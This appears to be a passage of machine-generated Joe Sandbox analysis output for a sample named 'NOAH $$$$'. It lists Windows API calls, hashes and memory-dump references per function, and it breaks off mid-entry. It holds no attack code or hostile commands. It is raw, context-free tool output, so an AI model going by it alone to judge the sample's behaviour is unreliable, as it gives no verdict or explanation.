                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3275902921-0
                                                                                                                                        • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                        • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                        • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                        • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3275902921-0
                                                                                                                                        • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32 ref: 004555C7
                                                                                                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3691411573-0
                                                                                                                                        • Opcode ID: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                                                                        • Instruction ID: ee39a3c17b45488341a0d6beee4a1abd3419bb98b1a9b0cd73eda499273a4889
                                                                                                                                        • Opcode Fuzzy Hash: da631fe096052ef5bd48ea011818ab2276afcb1e35ba95b92101ff2cabc01c83
                                                                                                                                        • Instruction Fuzzy Hash: C011B6B12047419BC710DF65EDC8A2A77A8BF18322F10066AFD50DB2D2D779D849C729
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                                        • EndPath.GDI32(?), ref: 004472D6
                                                                                                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 372113273-0
                                                                                                                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsDevice$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1035833867-0
                                                                                                                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 0041708E
                                                                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                                                                                                        • __lock.LIBCMT ref: 004170BE
                                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                                                                                                        • _free.LIBCMT ref: 004170EE
                                                                                                                                        • InterlockedIncrement.KERNEL32(02F92D00), ref: 00417106
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3470314060-0
                                                                                                                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                                                                                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                                                                                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                                                                                                        APIs
                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                                        APIs
                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                                        APIs
                                                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 442100245-0
                                                                                                                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                                                                                                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                                                                                                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                        • _wcslen.LIBCMT ref: 0045F94A
                                                                                                                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 621800784-4108050209
                                                                                                                                        • Opcode ID: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                                                                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                        • Opcode Fuzzy Hash: a44a9b3346c6bb8aee0ad9873ab8e4bb0a101d6bd4856354047c9bdc96e9273a
                                                                                                                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                                        • String ID: \VH
                                                                                                                                        • API String ID: 3884216118-234962358
                                                                                                                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                                        APIs
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                                        • IsMenu.USER32(?), ref: 0044854D
                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                                        • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2029546176.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2029321515.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030174584.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030193374.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030208247.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030223101.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2030254952.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NOAH $$$$.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 3076010158-4108050209
                                                                                                                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
